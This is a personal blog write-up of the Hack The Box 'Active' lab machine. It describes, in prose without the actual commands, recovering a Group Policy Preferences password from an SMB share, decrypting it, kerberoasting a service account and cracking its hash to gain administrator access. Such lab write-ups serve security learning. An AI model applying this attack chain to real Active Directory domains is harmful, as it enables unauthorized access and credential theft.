Write-Up: HTB Active

For my second blog I tackled the Active box on Hack the Box.

Started off running the standard NMAP scan. After opening up the out file there is a lot available. Haven’t stumbled upon too many boxes that aren’t web servers, but this one is definitely not based on the ports. That said, it looks like we’re facing a Windows 2008 server with SMB, Kerberos, and LDAP (domain controller?) all running.

First thing to attempt is an anonymous smbmap scan. I tend to waffle between using this tool vs. smbclient, but went with smbmap this time. Looking at the results, I have access to the “Replication” share.

Use -R with smbmap to recursively dump the Replication share. Lots of output and for some reason it didn’t follow all folder paths completely… Strange.

Tried again on the various sub folders (cut out the non-interesting one to save some space) and found the groups directory and groups.xml file in the Policies folder. Based on some previous research (Thanks Sean Metcalf for all your AD work), we know that these files can sometimes contain password.

Download the file… Drum-roll please.

And there it is! I’ve got a username some form of password hash.

Not 100% sure what kind of hash this is so it’s time to google. Searched, “Microsoft group policy password hash” and found that it is most likely a GPP hash (Thanks Sean, again). First tool that comes up is Gpp-decrypt and it’s already on kali — time to get to cracking. Throw the hash in and there we go, we have a password! Now time to keep poking.

Try smbmap with the new user and password combo.

The Users share immediately sticks out. Dug in and holy output from the smb recursive command, but reading through there’s a gem at the bottom.

Grab that flag and send it in.

Next, I tried crackmap exec to see if I could pop a shell, but nothing. No write permissions, unfortunately.

Looking back at the scan we know the box has LDAP and Kerb running. Let’s enumerate with Impacket modules and see what I can find (Another shoutout needed here to Tim Medin for his kerberoasting webinars).

Found some users and attempted the password with them and crackmapexec, but no dice. Time to try another module to see if we can grab a hash. And there it is! (Note: Command output copied poorly into the code box below so I did some formatting.)

ID’d the hash as (Kerberos 5 TGS-REP etype 23). Throw the hash into hash cat and…

We get a hit!

I checked smbmap on my first attempt, but I could have also ran crackmapexec to check if I could own the user and then run psexec.py. Ultimately, both paths will get the flag, just one with an actual shell :)

Run another recursive smbmap command on the Users sharewith admin creds.

And grab the flag — box owned!

If you made it this far, thank you for reading! I am attempting to put out one blog a week as I go through old boxes so check back for more HTB write-ups.



Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store